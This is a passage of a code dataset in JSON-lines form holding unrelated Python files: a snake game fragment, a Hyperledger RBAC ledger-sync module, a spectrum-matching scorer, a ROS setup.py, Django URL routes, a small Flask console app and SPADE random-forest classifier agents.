食物碰到头部或身体,则游戏结束\n is_dead = True\n elif food_content == SPACE: # 只能移到空白处\n food = food_ # 食物移动到空白位置\n\n if not is_dead: # 游戏未结束\n world[food[0]][food[1]] = FOOD # 更新食物\n\n print(term.move_yx(0, 0)) # 移动光标到屏幕左上角\n # 重新绘制世界\n for row in world:\n print(' '.join(row))\n\n score += 1\n print(f'score: {score:2d} - speed: {speed:.2f}')\n\n if is_dead:\n break\n\n turn += 1\n\nprint('game over')\n","repo_name":"corleytd/Hands-on-Crawler-with-Python","sub_path":"applications/snake_game/snake_advanced.py","file_name":"snake_advanced.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"38042179793","text":"import sys\n\nfrom environs import Env\nimport rethinkdb as r\n\nfrom rbac.common.addresser import AddressSpace, parse, get_address_type\nfrom rbac.common.logs import get_default_logger\nfrom rbac.common.util import bytes_from_hex\nfrom rbac.ledger_sync.deltas.decoding import TABLE_NAMES\nfrom rbac.server.db.relationships_query import (\n fetch_relationships_by_id,\n fetch_remote_id_relationships,\n)\n\nENV = Env()\nLOGGER = get_default_logger(__name__)\n\n\ndef get_role(conn, role_id):\n \"\"\"Get a role resource by role_id.\"\"\"\n resource = (\n r.table(\"roles\")\n .get_all(role_id, index=\"role_id\")\n .merge(\n {\n \"members\": fetch_remote_id_relationships(\n \"role_members\", \"role_id\", role_id\n )\n }\n )\n .without(\"created_date\", \"end_block_num\", \"id\", \"role_id\", \"start_block_num\")\n .coerce_to(\"array\")\n .run(conn)\n )\n return resource\n\n\ndef get_user(conn, next_id):\n \"\"\"Database query to get data on an individual user.\"\"\"\n resource = (\n r.table(\"users\")\n .get_all(next_id, index=\"next_id\")\n .merge(\n {\n \"id\": r.row[\"next_id\"],\n \"remote_id\": r.row[\"remote_id\"],\n \"name\": r.row[\"name\"],\n \"email\": r.row[\"email\"],\n \"username\": r.row[\"username\"],\n \"metadata\": r.row[\"metadata\"],\n \"memberOf\": fetch_relationships_by_id(\n \"role_members\", next_id, \"role_id\"\n ),\n }\n )\n .map(\n lambda user: (user[\"manager_id\"] != \"\").branch(\n user.merge({\"manager\": user[\"manager_id\"]}), user\n )\n )\n .without(\"next_id\", \"start_block_num\", \"end_block_num\")\n .coerce_to(\"array\")\n .run(conn)\n )\n return resource\n\n\ndef get_updater(conn, block_num):\n \"\"\" Returns an updater function, which can be used to update the database\n appropriately for a particular address/data combo.\n \"\"\"\n return lambda adr, rsc: _update(conn, block_num, adr, rsc)\n\n\ndef _update_state(conn, block_num, address, resource):\n \"\"\" Update the state, state_history and metadata tables\n \"\"\"\n try:\n # update state table\n now = r.now()\n address_parts = parse(address)\n address_binary = bytes_from_hex(address)\n object_id = bytes_from_hex(address_parts.object_id)\n object_type = address_parts.object_type.value\n related_id = bytes_from_hex(address_parts.related_id)\n related_type = address_parts.related_type.value\n relationship_type = address_parts.relationship_type.value\n\n data = {\n \"address\": address_binary,\n \"object_type\": object_type,\n \"object_id\": object_id,\n \"related_type\": related_type,\n \"relationship_type\": relationship_type,\n \"related_id\": related_id,\n \"block_created\": int(block_num),\n \"block_num\": int(block_num),\n \"updated_date\": now,\n **resource,\n }\n delta = {\"block_num\": int(block_num), \"updated_at\": now, **resource}\n\n query = (\n r.table(\"state\")\n .get(address_binary)\n .replace(\n lambda doc: r.branch(\n # pylint: disable=singleton-comparison\n (doc == None), # noqa\n r.expr(data),\n doc.merge(delta),\n ),\n return_changes=True,\n )\n )\n\n result = query.run(conn)\n\n if result[\"errors\"] > 0:\n LOGGER.warning(\"error updating state table:\\n%s\\n%s\", result, query)\n if result[\"replaced\"] and \"changes\" in result and result[\"changes\"]:\n query = r.table(\"state_history\").insert(result[\"changes\"][0][\"old_val\"])\n result = query.run(conn)\n # data[\"address\"] = [address_binary, int(block_num)]\n if result[\"errors\"] > 0:\n LOGGER.warning(\n \"error updating state_history table:\\n%s\\n%s\", result, query\n )\n\n if not related_id:\n data[\"address\"] = address_binary\n del data[\"related_type\"]\n del data[\"relationship_type\"]\n del data[\"related_id\"]\n query = (\n r.table(\"metadata\")\n .get(address_binary)\n .replace(\n lambda doc: r.branch(\n # pylint: disable=singleton-comparison\n (doc == None), # noqa\n r.expr(data),\n doc.merge(delta),\n )\n )\n )\n result = query.run(conn)\n if result[\"errors\"] > 0:\n LOGGER.warning(\"error updating metadata record:\\n%s\\n%s\", result, query)\n\n except Exception as err: # pylint: disable=broad-except\n LOGGER.warning(\"update_state %s error:\", type(err))\n LOGGER.warning(err)\n\n\ndef _update_legacy(conn, block_num, address, resource, data_type):\n \"\"\" Update the legacy sync tables (expansion by object type name)\n \"\"\"\n try:\n data = {\n \"id\": address,\n \"start_block_num\": int(block_num),\n \"end_block_num\": int(sys.maxsize),\n **resource,\n }\n\n query = (\n r.table(TABLE_NAMES[data_type])\n .get(address)\n .replace(\n lambda doc: r.branch(\n # pylint: disable=singleton-comparison\n (doc == None), # noqa\n r.expr(data),\n doc.merge(resource),\n )\n )\n )\n result = query.run(conn)\n if result[\"errors\"] > 0:\n LOGGER.warning(\"error updating legacy state table:\\n%s\\n%s\", result, query)\n\n except Exception as err: # pylint: disable=broad-except\n LOGGER.warning(\"_update_legacy %s error:\", type(err))\n LOGGER.warning(err)\n\n\ndef format_role(role_resource):\n \"\"\" Formats given role_resource into the proper format to be added to the data\n field of an outbound_queue entry.\n\n Args:\n role_resource: (dict) A snapshot of the current state of the role from the\n roles RethinkDB table. The mandatory keys in the dict are:\n {\n \"description\": (str)\n \"members\": (array of strings containing members' remote_ids)\n \"remote_id\": (str)\n }\n Returns:\n formatted_resource: (dict) Formatted version of role_resource to be inserted\n into outbound_queue RethinkDB table. The formatted dict would look like:\n {\n \"description\": (str)\n \"members\": (array of strings containing members' remote_ids)\n \"remote_id\": (str)\n }\n \"\"\"\n if role_resource[\"remote_id\"] == \"\" and ENV.str(\"GROUP_BASE_DN\", \"\"):\n remote_id = \"CN=\" + role_resource[\"name\"] + \",\" + ENV(\"GROUP_BASE_DN\")\n else:\n remote_id = role_resource[\"remote_id\"]\n return {\"members\": role_resource[\"members\"], \"remote_id\": remote_id}\n\n\ndef get_provider(admin_identifier):\n \"\"\" Gets the provider field value for a outbound_queue entry.\n\n Args:\n admin_identifier: (str) Name of role or username of user\n Returns:\n provider: (str) Depending on the current mode enabled, return\n the proper provider value. The value is either `NEXT-created`,\n LDAP_DC, or TENANT_ID set in .env file.\n \"\"\"\n if admin_identifier == \"NextAdmins\" or admin_identifier == ENV(\"NEXT_ADMIN_USER\"):\n return \"NEXT-created\"\n if ENV.int(\"ENABLE_LDAP_SYNC\", 0):\n return ENV(\"LDAP_DC\")\n if ENV.int(\"ENABLE_AZURE_SYNC\", 0):\n return ENV(\"TENANT_ID\")\n return \"NEXT-created\"\n\n\ndef _update_provider(conn, address_type, resource):\n \"\"\"Places updated object on the provider outbound queue.\n\n Gets the full details of the updated resource, adds it to the outbound\n queue, where provider sync (ldap/azure) will pop the resource from the\n queue & update the provider as needed.\n\n Args:\n conn: A rethinkDB connection\n address_type: The type of the address\n resource: The resource data\n \"\"\"\n outbound_types = {\n AddressSpace.ROLES_ATTRIBUTES: \"role\",\n AddressSpace.ROLES_MEMBERS: \"role\",\n }\n if address_type in outbound_types:\n # Get the object & format it.\n provider_action = \"\"\n direction = \"\"\n if outbound_types[address_type] == \"role\":\n role = get_role(conn, resource[\"role_id\"])\n if role:\n formatted_resource = format_role(role[0])\n else:\n # If the role has not been detected yet, this is due to the role\n # relationship being inserted prior to the actual role object the\n # following debug statement is meant to be outputted.\n LOGGER.debug(\n \"Role %s has not been inserted into RethinkDB yet...\",\n resource[\"role_id\"],\n )\n return\n admin_identifier = role[0][\"name\"]\n data_type = \"group\"\n direction = role[0][\"metadata\"].get(\"sync_direction\", \"\")\n # Insert to outbound queue.\n if direction == \"OUTBOUND\":\n provider = get_provider(admin_identifier)\n\n outbound_entry = {\n \"data\": formatted_resource,\n \"data_type\": data_type,\n \"timestamp\": r.now(),\n \"provider_id\": provider,\n \"status\": \"UNCONFIRMED\",\n \"action\": provider_action,\n }\n r.table(\"outbound_queue\").insert(outbound_entry, return_changes=True).run(\n conn\n )\n return\n\n\ndef _update(conn, block_num, address, resource):\n \"\"\" Handle the update of a given address + resource update\n \"\"\"\n data_type = get_address_type(address)\n pre_filter(resource)\n\n _update_state(conn, block_num, address, resource)\n\n if data_type in TABLE_NAMES:\n _update_legacy(conn, block_num, address, resource, data_type)\n _update_provider(conn, data_type, resource)\n\n\ndef pre_filter(resource):\n \"\"\" Filter or modifies values prior to writing them to the rethink sync tables\n 1. Changes dates from Int64 to a DateTime (Int64 would otherwise get translated to a string)\n \"\"\"\n keys = [key for key in resource]\n for key in keys:\n if key.endswith(\"_date\"):\n try:\n value = resource[key]\n if value and int(value) != 0:\n resource[key] = r.epoch_time(int(value))\n else:\n del resource[key]\n except Exception: # pylint: disable=broad-except\n del resource[key]\n","repo_name":"hyperledger-archives/sawtooth-next-directory","sub_path":"rbac/ledger_sync/deltas/updating.py","file_name":"updating.py","file_ext":"py","file_size_in_byte":10997,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"3"}
+{"seq_id":"38088041439","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 29 09:57:30 2018\n\n@author: HALGhoul\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 21 10:11:13 2017\n\n@author: Hussein Al Ghoul\n\"\"\"\n\nimport os\nimport time\nimport pandas as pd\nimport numpy as np\n\nm=0.5\nn=0.5\ndef Commons(chunks,dfU,ppm_sl,filtering,energy=False):\n print (\"starting Commons\")\n df_list=list()\n dfL_list=list()\n dfU['MASS_y'] = dfU['MASS'].round(6) \n #dfU.rename(columns={'PMASS':'PMASS_y'},inplace=True) \n dfU['MASS'] = dfU['MASS'].round(1)\n dfU['WEIGHTSM'] = (dfU['INTENSITY0M']**m)*(dfU['PMASS_y']**n)\n for chunk in chunks:\n df = None\n dfL = None\n dfInput = None\n dfL = chunk \n dfL['MASS_x'] = dfL['MASS']\n #dfL.rename(columns={'PMASS':'PMASS_x'},inplace=True) \n dfL['MASS'] = dfL['MASS'].round(1)\n #dfL = dfL.groupby(['MASS','DTXCID']).head(30)\n dfL['WEIGHTSC'] = (dfL['INTENSITY0C']**m)*(dfL['PMASS_x']**n)\n dfInput = dfU\n if energy:\n df = pd.merge(dfL,dfInput,how='left',on=['MASS','ENERGY']) \n else:\n df = pd.merge(dfL,dfInput,how='left',on='MASS') \n if ppm_sl >=1:\n df['MATCHES'] = np.where((((abs(df.PMASS_x-df.PMASS_y)/df.PMASS_x)*1000000)<=ppm_sl),'1','0') \n else:\n df['MATCHES'] = np.where((abs(df.PMASS_x-df.PMASS_y)<=ppm_sl),'1','0') \n df.drop(df[df['MATCHES'] == '0'].index,inplace=True)\n df.sort_values(['DTXCID','ENERGY','PMASS_x','INTENSITY0C'],ascending=[True,True,True,False],inplace=True) \n df_list.append(df)\n dfL_list.append(dfL)\n\n dft=pd.concat(df_list)\n dfLt=pd.concat(dfL_list)\n dft.to_csv(\"cfmid_match.csv\",index=False)\n\n if filtering:\n #dft['INTENSITY0CR'] = (dft['INTENSITY0C']/dft.groupby(['DTXCID','ENERGY'])['INTENSITY0C'].transform(sum))\n dft.sort_values(['DTXCID','ENERGY','INTENSITY0C'],ascending=[True,True,False],inplace=True) \n #dft['cumsum'] = dft['INTENSITY0CR'].cumsum()\n #dfLt = dfLt[dfLt['INTENSITY0CR'] > dfLt['INTENSITY0CR'].quantile(0.3)]\n '''select the top 30 matches only and filter out DTXCIDs with less than 5 matches'''\n dft = dft.groupby(['DTXCID','ENERGY']).head(30)\n dft = dft.groupby(['DTXCID','ENERGY']).filter(lambda x: len(x)>=5)\n #print dfLt.groupby(['DTXCID','ENERGY']).filter(lambda s: s.INTENSITY0CR.sum() <= 0.8)\n #dfLt = dfLt[dfLt['cumsum']<=0.8]\n #print dfL[dfL['INTENSITY0CR'].groupby(['DTXCID','ENERGY']).transform('sum') <=0.8]\n #print dfL\n else:\n dft = dft[(dft['INTENSITY0C']<=100) & (dft['INTENSITY0C']>0.0)] \n \n dft.to_csv(\"cfmid.csv\",index=False)\n\n WLI = dfLt.groupby(['MASS_x','DTXCID','FORMULA','ENERGY'])['WEIGHTSC'].apply(list).to_dict() \n #print WLI \n WUI = dfU.groupby('MASS_y')['WEIGHTSM'].apply(list).to_dict() \n #df.to_csv(\"Commons_Output.csv\",index=False)\n WL = dft.groupby(['MASS_x','DTXCID','FORMULA','ENERGY'])['WEIGHTSC'].apply(list).to_dict()\n WU = dft.groupby(['MASS_x','DTXCID','FORMULA','ENERGY'])['WEIGHTSM'].apply(list).to_dict()\n print(len(WL))\n #print WUI\n W = list()\n W.append(WL)\n W.append(WU)\n W.append(WLI)\n W.append(WUI)\n return W\n\ndef FR(WL,WU):\n #print WL\n #print WU\n num =0.0\n den = 0.0\n SUM = 0.0\n for i in range(0,len(WL)):\n num = WL[i]*WU[i-1]\n den = WL[i-1]*WU[i]\n if (num/den) <= 1:\n l = 1\n else:\n l = -1\n SUM += (num/den)**l \n F_R = (1.0/float(len(WL)))*SUM\n return F_R\n\ndef FD(WL,WU,WLI,WUI):\n #print WL\n #print WU\n SUMU = 0.0\n SUML = 0.0\n SUM = 0.0\n F_D = 0.0\n #print WUI\n for i in range(0,len(WUI)):\n #print WUI[i]\n SUMU += WUI[i]*WUI[i]\n #print SUMU\n for i in range(0,len(WLI)):\n SUML += WLI[i]*WLI[i]\n #print SUML\n for i in range(0,len(WL)):\n #print WU[i]\n SUM += WL[i]*WU[i]\n #print SUM\n F_D = (SUM*SUM)/(SUMU*SUML)\n #print F_D\n return F_D \n \ndef Score(dfL=None,dfU=None,Mass=0.0,ppm_sl=0,filtering=False,energy=False):\n DF=list()\n W = Commons(dfL,dfU,ppm_sl,filtering,energy)\n WL=set(W[0])\n #print WL\n WLI=set(W[2])\n record = list()\n records = list()\n #print WLI\n #for keys in WLI.intersection(WL):\n for keys in WLI:\n\n #print W[0][keys] \n #print W[1][Mass]\n N_LU=0\n F_D=0.0\n F_R=0.0\n score=0.0\n if keys in WLI.intersection(WL):\n N_LU = len(W[0][keys])\n N_U = len(W[3][Mass]) \n F_D = FD(W[0][keys],W[1][keys],W[2][keys],W[3][Mass])\n F_R = FR(W[0][keys],W[1][keys]) \n else:\n F_D = 0.0\n #score = ((N_U*F_D) + (N_LU*F_R))/(N_U + N_LU)\n record = list(keys)\n record.append(F_D)\n #record.append(score)\n records.append(record)\n #dfL_plot = dfL.loc[dfL['DTXCID'].isin([keys[1]])].reset_index()\n #plot(dfL_plot,dfU)\n dfi = pd.DataFrame.from_records(records,columns=['MASS','DTXCID','FORMULA','ENERGY','SCORE'])\n df = pd.DataFrame(columns=['MASS','DTXCID','FORMULA','ENERGY','SCORE'])\n dfs = pd.DataFrame(columns=['MASS','DTXCID','FORMULA','ENERGY','SCORE'])\n if not dfi.empty:\n dfi.sort_values(['ENERGY','SCORE'],ascending=[True,True],inplace=True)\n #df['RANK'] = df.groupby(['FORMULA','ENERGY'])['SCORE'].rank(method='dense',ascending=False) \n #df = df.pivot(index='DTXCID', columns='ENERGY', values='SCORE')\n dfp = pd.pivot_table(dfi,values='SCORE', index='DTXCID',columns='ENERGY').reset_index()\n print(dfp)\n df = pd.merge(dfi,dfp,how='inner',on='DTXCID')\n df.drop(['ENERGY','SCORE'], axis=1,inplace=True)\n df.drop_duplicates(subset=['DTXCID'],keep='first',inplace=True)\n if 'energy0' in df:\n df['RANK_E0'] = df.groupby(['FORMULA'])['energy0'].rank(method='dense',ascending=False) \n else:\n df['RANK_E0'] = None\n if 'energy1' in df: \n df['RANK_E1'] = df.groupby(['FORMULA'])['energy1'].rank(method='dense',ascending=False) \n else:\n df['Rank_E1'] = None\n if 'energy2' in df: \n df['RANK_E2'] = df.groupby(['FORMULA'])['energy2'].rank(method='dense',ascending=False)\n else:\n df['Rank_E2'] = None\n df.sort_values(['MASS','FORMULA','RANK_E0'],ascending=True,inplace=True) \n df['MATCHES'] = df.groupby(['MASS','FORMULA'])['FORMULA'].transform('count')\n df.reset_index()\n df.to_csv('try_the_index.csv',index=False)\n print (df)\n #df.to_csv('Score_Alllevels.csv',index=False)\n dfs = dfi.groupby(['DTXCID','MASS','FORMULA'],as_index=False)['SCORE'].sum()\n dfs.reset_index()\n dfs['RANK'] = dfs.groupby(['FORMULA'])['SCORE'].rank(method='dense',ascending=False) # rank according to formula here by adding ['FORMULA','ENERGY']\n dfs['MATCHES'] = dfs.groupby(['MASS','FORMULA'])['FORMULA'].transform('count')\n dfs.sort_values(['MASS','FORMULA','RANK'],ascending=True,inplace=True) \n #print (dfs)\n #dfs.to_csv(\"Score_Sum.csv\",index=False)\n print (\"Number of Matches: \" + str(len(WL)))\n DF.append(df)\n DF.append(dfs)\n return DF\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n \n \n","repo_name":"NTA-Code/cfmid","sub_path":"Search code/CosineDotProduct_v24.py","file_name":"CosineDotProduct_v24.py","file_ext":"py","file_size_in_byte":7350,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"1397366877","text":"from setuptools import setup\n\npackage_name = 'rosbag2_upgrader'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='nm',\n maintainer_email='nhma@mmmi.sdu.dk',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'upgrade = rosbag2_upgrader.upgrade:main'\n ],\n },\n)\n","repo_name":"nhma20/rosbag2_upgrader","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"74263096080","text":"from . import views\nfrom django.urls import path\n\nurlpatterns = [\n path('', views.BoardListView.as_view(), name='home'),\n path('api/boards/', views.get_all_boards),\n path('api/boards//', views.get_particular_board),\n path('api/boards//topics/', views.get_all_topics_of_particular_board),\n path('api/boards//topics//', views.get_particular_topic),\n path('boards//', views.TopicListView.as_view(), name='board_topics'),\n path('boards//new/', views.new_topic, name='new_topic'),\n path('boards//topics//', views.PostListView.as_view(), name='topic_posts'),\n path('boards//topics//reply/', views.reply_topic, name='reply_topic'),\n path('boards//topics//posts//edit/', views.PostUpdateView.as_view(), name='edit_post'),\n]\n","repo_name":"KishwarMaheen/myproject","sub_path":"myproject/boards/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31457092072","text":"from flask import Flask, render_template, request\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nimport waitress\r\n\r\napp = Flask(__name__)\r\n\r\ndef process_command(command):\r\n if command.lower() == \"hello\":\r\n return \"welcome to cloudconsole v1.0!\"\r\n elif command.lower().startswith(\"say \"):\r\n return command[4:]\r\n elif command.lower() == \"help\":\r\n return \"\"\"commands:\r\n say - type your text\r\n clear - clear the console\r\n help - display list of commands\r\n info - display info\"\"\"\r\n elif command.lower() == \"clear\":\r\n return \"console cleared.\"\r\n elif command.lower() == \"info\":\r\n return \"\"\"made by toxinsfx\r\n (made in python)\r\n \"\"\"\r\n else:\r\n return \"command not recognized.\"\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n if request.method == 'POST':\r\n input_text = request.form['input_text']\r\n response = process_command(input_text)\r\n return render_template('index.html', response=response)\r\n return render_template('index.html')\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, host='0.0.0.0') # debug\r\n #waitress.serve(app, host='0.0.0.0', port=7777)\r\n","repo_name":"wtftoxins/Consolev1.0-src","sub_path":"consolev2.py","file_name":"consolev2.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18846479512","text":"#print(\"in RFCA, importing RFClassifier...\")\nimport RFClassifier as rfc\n#print(\"in RFCA, importing DatasetManager...\")\nimport DatasetManager as dsm\n#print(\"in RFCA, importing random...\")\nimport random as rd\n#print(\"in RFCA, importing spade...\")\nimport spade\n#print(\"in RFCA, importing pandas...\")\nimport pandas as pd\nimport os\n\n#TRAINING_SIZE = (rd.randrange(4) + 4) * 100\nTRAINING_SIZE = 4445\nDS_MANAGER = dsm.DatasetManager(TRAINING_SIZE)\nTRAIN,TEST = DS_MANAGER.getSets()\nMSG_WAIT = 2\n\n# Each agent will perform its own classification, so they will all have their own instance\n# of RFClassifier. Agents differ only in how they communicate\nclass BaseAgent(spade.Agent.Agent):\n\tdef __init__(self,myID,myPass,mm,nt,nb,bs):\n\t\t# Approx 100 trees\n\t\tself.classifier = rfc.RFClassifier(rd.randrange(nb+1)*bs + (nt - (nb/2)*bs),True,False,mm)\n\n\t\t# Exactly 1 tree\n\t\t#self.classifier = rfc.RFClassifier(1,True,False)\n\n\n\t\tsuper(BaseAgent,self).__init__(myID,myPass)\n\n\tdef getRandom(self,row):\n\t\treturn rd.random()\n\n\t# Find the appropriate list index (over probability list l)\n\t# for the value c\n\tdef determineIndex(self,l,c):\n\t\tif (c > 1):\n\t\t\treturn -1 # Error, value must be 0 <= c <= 1\n\t\tcounter = 1\n\t\twhile counter <= len(l):\n\t\t\tif sum(l[:counter]) >= c:\n\t\t\t\treturn counter-1\n\t\t\tcounter+=1\n\t\t\n\tdef chooseStateEstimate(self,row,probs):\n#\tn = 2 case\n# \t\tif row['Belief Val'] < cutoff:\n# \t\t\treturn row['Predicted State']\n# \t\telse:\n# \t\t\treturn row['Alternate State']\n\t\tchoice = self.determineIndex(probs, row['Belief Val'])\n\t\tif choice == 0:\n\t\t\treturn row['Predicted State']\n\t\telse:\n\t\t\treturn row['Alternate State_{0}'.format(choice-1)]\n\n\tdef chooseRegionEstimate(self,row,probs):\n#\tn = 2 case\n# \t\tif row['Belief Val'] < cutoff:\n# \t\t\treturn row['Predicted Region']\n# \t\telse:\n# \t\t\treturn row['Alternate Region']\n\t\tchoice = self.determineIndex(probs, row['Belief Val'])\n\t\tif choice == 0:\n\t\t\treturn row['Predicted Region']\n\t\telse:\n\t\t\treturn row['Alternate Region_{0}'.format(choice-1)]\n\n\tdef makeGuess(self,df1,probs):\n\t\t#print('Inside the makeGuess function...')\n\n\t\t#print('Defining Lambdas...')\n\t\tstate_fn = lambda x: self.chooseStateEstimate(x,probs)\n\t\tregion_fn = lambda x: self.chooseRegionEstimate(x,probs)\n\n\t\t#print('Setting up new columns...')\n\t\t#df1['Alternate State'] = df2['Predicted State']\n\t\t#df1['Alternate Region'] = df2['Predicted Region']\n\t\t#print('Adding belief val...')\n\t\tdf1['Belief Val'] = df1.apply(self.getRandom, axis=1)\n\t\t#print('Getting educated state...')\n\t\tdf1['Educated State'] = df1.apply(state_fn, axis=1)\n\t\t#print('Getting educated region...')\n\t\tdf1['Educated Region'] = df1.apply(region_fn, axis=1)\n\t\t#print('Returning dataframe...')\n\t\t#print('Exiting makeGuess')\n\t\treturn df1\n\n\tdef addMetricColumns(self,df):\n\t\t#print('Setting result stuff...')\n\t\ted_states_results = (df['State']==df['Educated State']).apply(self.boolToInt)\n\t\ted_regions_results = (df['Region']==df['Educated Region']).apply(self.boolToInt)\n\t\torig_states_results = (df['State']==df['Predicted State']).apply(self.boolToInt)\n\t\torig_regions_results = (df['Region']==df['Predicted Region']).apply(self.boolToInt)\n\n\t\t#print('calculations')\n\t\ttot_recs = len(ed_states_results)\n\n\t\tos_num = sum(orig_states_results)\n\t\tor_num = sum(orig_regions_results)\n\t\tos_pct = float(os_num)/float(tot_recs)\n\t\tor_pct = float(or_num)/float(tot_recs)\n\n\t\tes_num = sum(ed_states_results)\n\t\ter_num = sum(ed_regions_results)\n\t\tes_pct = float(es_num)/float(tot_recs)\n\t\ter_pct = float(er_num)/float(tot_recs)\n\n\t\t#print('Setting some columns to nums')\n\t\tdf['States Guessed'] = os_num\n\t\tdf['States Guessed %'] = os_pct\n\t\tdf['Regions Guessed'] = or_num\n\t\tdf['Regions Guessed %'] = or_pct\n\t\tdf['Informed States Guessed'] = es_num\n\t\tdf['Informed States Guessed %'] = es_pct\n\t\tdf['Informed Regions Guessed'] = er_num\n\t\tdf['Informed Regions Guessed %'] = er_pct\n\n\t\t#print('returning')\n\t\treturn df\n\n\tdef boolToInt(self,b):\n\t\treturn int(b)\n\n\nclass TalkerAgent(BaseAgent):\n\t\"\"\"This agent will calculate classifications and send to another agent\"\"\"\n\n\tdef __init__(self,receiverID,myID,myPass,mm,nt,nb,bs):\n\t\tself.receiver_id = spade.AID.aid(name=receiverID,\n\t\t\t\taddresses=[\"xmpp://\"+receiverID])\n\t\tsuper(TalkerAgent,self).__init__(myID,myPass,mm,nt,nb,bs)\n\n\tclass InformBehav(spade.Behaviour.OneShotBehaviour):\n\n\t\tdef _process(self):\n\t\t\t#print(\"My receiver is called {0}\".format(self.myAgent.receiver_id))\n\t\t\treceiver = self.myAgent.receiver_id\n\n\t\t\tself.msg = spade.ACLMessage.ACLMessage()\n\t\t\tself.msg.setPerformative(\"inform\")\n\t\t\tself.msg.setOntology(\"classifierResults\")\n\t\t\tself.msg.setLanguage(\"OWL-S\")\n\t\t\tself.msg.addReceiver(receiver)\n\n\t\t\ttestedSet = self.myAgent.classifier.perform_classification(TRAIN,TEST)\n\t\t\t#print('Tested!\\nSetting content...')\n\t\t\ttestedSet['Estimators'] = self.myAgent.classifier.num_estimators\n\t\t\tmessageText = testedSet[['Predicted State','Predicted Region','Estimators']].to_json()\n\t\t\t#print('Final string is {0} chars long...'.format(len(messageText)))\n\t\t\tself.msg.setContent(messageText)\n\t\t\t#self.msg.setContent('ehllo guvnor')\n\t\t\t#print('Set!')\n\t\t\t#self.msg.setContent(\"test\")\n\n\t\t\t#print(type(self.msg.getContent()))\n\t\t\t#print(self.msg.getContent()[:100])\n\t\t\tprint('{0} sending message to {1}'.format(self.myAgent.getName(),receiver.getName()))\n\t\t\tself.myAgent.send(self.msg)\n\t\t\tprint('Sent!')\n\t\t\tdel(self.msg)\n\t\t\tdel(testedSet)\n\t\t\tdel(messageText)\n\t\t\tdel(self.myAgent.classifier)\n\t\t\t#print('Killin\\' it')\n\t\t\tagent_name = self.myAgent.getName()\n\t\t\tself.myAgent.stop()\n\t\t\t#print('Killed: {0}'.format(agent_name))\n\n\tdef _setup(self):\n\t\tb = self.InformBehav()\n\t\tself.setDefaultBehaviour(b)\n\nclass ListenerAgent(BaseAgent):\n\t\"\"\"This agent will receive messages only\"\"\"\n\tdef __init__(self,myID,myPass,numTalkers,mm,nt,nb,bs):\n\t\tself.numTalkers = numTalkers\n\t\tself.numHeard = 0\n\t\tself.probability = []\n\t\tself.dataFrame = None\n\t\tsuper(ListenerAgent,self).__init__(myID,myPass,mm,nt,nb,bs)\n\t\n\tclass ReceiveBehav(spade.Behaviour.Behaviour):\n\t\t\n\t\tdef _process(self):\n\t\t\tself.msg = None\n\t\t\t#print('Hello _process')\n\n\t\t\tself.msg = self._receive(True, MSG_WAIT)\n\t\t\tif self.msg:\n\t\t\t\t#print(\"Received!\")\n\n\n\t\t\t\tmyNewDataFrame = pd.read_json(self.msg.getContent())\n\n\t\t\t\t#print('Okay, chugging along')\t\n\t\t\t\tif self.myAgent.numHeard == 0:\n\t\t\t\t\tself.myAgent.dataFrame = self.myAgent.classifier.perform_classification(TRAIN,TEST)\n\t\t\t\t\t#print('Muckling with probability array')\n\t\t\t\t\tself.myAgent.probability.append(self.myAgent.classifier.num_estimators)\n\t\t\t\t\t#print('Consider it muckled')\n\t\t\t\t\t\n\t\t\t\tmyDataFrame = self.myAgent.dataFrame\n\t\t\t\t\t\n\t\t\t\t#print('Still up to no good...')\n\t\t\t\tself.myAgent.probability.append(myNewDataFrame['Estimators'].max())\n\n\t\t\t\tmyDataFrame['Alternate State_{0}'.format(self.myAgent.numHeard)] = myNewDataFrame['Predicted State']\n\t\t\t\tmyDataFrame['Alternate Region_{0}'.format(self.myAgent.numHeard)] = myNewDataFrame['Predicted Region']\n\n\t\t\t\t\n\t\t\t\t#print('numheard is {0}... incrementing...'.format(self.myAgent.numHeard))\n\t\t\t\tself.myAgent.numHeard += 1\n\t\t\t\t#print(\"numheard is now {0}, but numtalkers is {1}\".format(self.myAgent.numHeard,self.myAgent.numTalkers))\n\t\t\t\tif self.myAgent.numHeard == self.myAgent.numTalkers:\n\t\t\t\t\t# decide on answers and spit out csv\n\t\t\t\t\tprint(self.myAgent.probability)\n\t\t\t\t\tsprob = sum(self.myAgent.probability)\n\t\t\t\t\talpha_prob = [float(i)/float(sprob) for i in self.myAgent.probability]\n\t\t\t\t\tprint(alpha_prob)\n\n\t\t\t\t\tmyDataFrame = self.myAgent.makeGuess(myDataFrame,alpha_prob)\n\t\t\t\t\t\n\t\t\t\t\tmyDataFrame = self.myAgent.addMetricColumns(myDataFrame)\n\t\t\t\t\t\n\t\t\t\t\twith open('sim4out.csv','a') as simout:\n\t\t\t\t\t\tsimout.write('{0},{1},{2},{3},{4},{5}\\n'.format(\n\t\t\t\t\t\t\t\tmyDataFrame['States Guessed'].max(),\n\t\t\t\t\t\t\t\tmyDataFrame['Regions Guessed'].max(),\n\t\t\t\t\t\t\t\tmyDataFrame['Informed States 